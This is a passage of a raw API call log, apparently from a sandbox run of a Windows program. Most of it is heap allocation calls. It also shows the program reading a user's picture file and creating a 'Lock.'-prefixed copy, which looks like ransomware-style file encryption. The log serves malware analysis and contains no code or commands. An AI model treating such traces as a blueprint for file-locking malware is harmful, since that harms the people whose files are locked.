returned 1 [0255.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0255.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0255.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0255.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0255.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0255.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0255.969] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0255.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0255.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0255.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0255.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0255.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0255.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0255.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0255.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0255.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0255.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0255.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0255.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0255.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0255.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0255.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0255.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0255.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0255.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0255.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0255.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0255.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0255.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0255.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0255.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0255.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0255.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0255.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0255.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0255.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0255.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0255.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0255.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0255.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0255.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0255.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0255.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0255.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0255.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0255.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0255.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0255.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0255.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0255.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0255.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0255.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0255.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0255.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0255.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0255.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0255.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0255.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0255.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0255.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0255.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0255.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0255.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0255.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0255.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0255.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0255.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0255.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0255.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0255.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0255.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0255.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0255.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0255.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0255.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0255.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0255.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0255.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0255.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0255.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0255.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0255.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0255.973] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0255.973] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.974] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.974] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0255.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0255.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0255.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0255.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0255.974] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/JP0X848xky.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\jp0x848xky.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0255.974] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0255.975] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0255.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0255.975] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0255.975] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.975] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0255.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0255.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0255.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0255.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0255.976] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/Lock.JP0X848xky.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lock.jp0x848xky.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0255.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0255.977] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0255.977] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.977] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0255.977] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0255.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0255.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0255.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0255.977] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0255.978] ReadFile (in: hFile=0x2a0, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x695b, lpOverlapped=0x0) returned 1 [0255.979] ReadFile (in: hFile=0x2a0, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0255.979] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0255.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0255.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0255.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0255.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0255.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x695b) returned 0x24c7a50 [0255.980] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0255.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0255.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0255.980] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0255.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0255.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0255.980] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0255.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0255.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0255.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0255.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2d28 [0255.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0255.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0255.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0255.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0255.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x695b) returned 0x24c7a50 [0255.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0255.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1938 [0255.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0255.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0255.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0255.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2088 [0255.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0255.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0255.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0255.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c08 [0255.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0255.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0255.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0255.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac978 [0255.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0255.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0255.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0255.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0255.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0255.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0255.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0255.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x695b) returned 0x24d4d20 [0255.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0255.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0255.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0255.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0255.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0255.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0255.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0255.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0255.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0255.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0255.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0255.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0255.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0255.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0255.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0255.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0255.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0255.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0255.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0255.983] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0255.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0255.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0255.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0255.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0255.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0255.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0255.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0255.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0255.984] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0255.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0255.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0255.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0255.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0255.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0255.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0255.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0255.984] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0255.984] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0255.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0255.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0255.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0255.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0255.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0255.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0255.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0255.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0255.985] 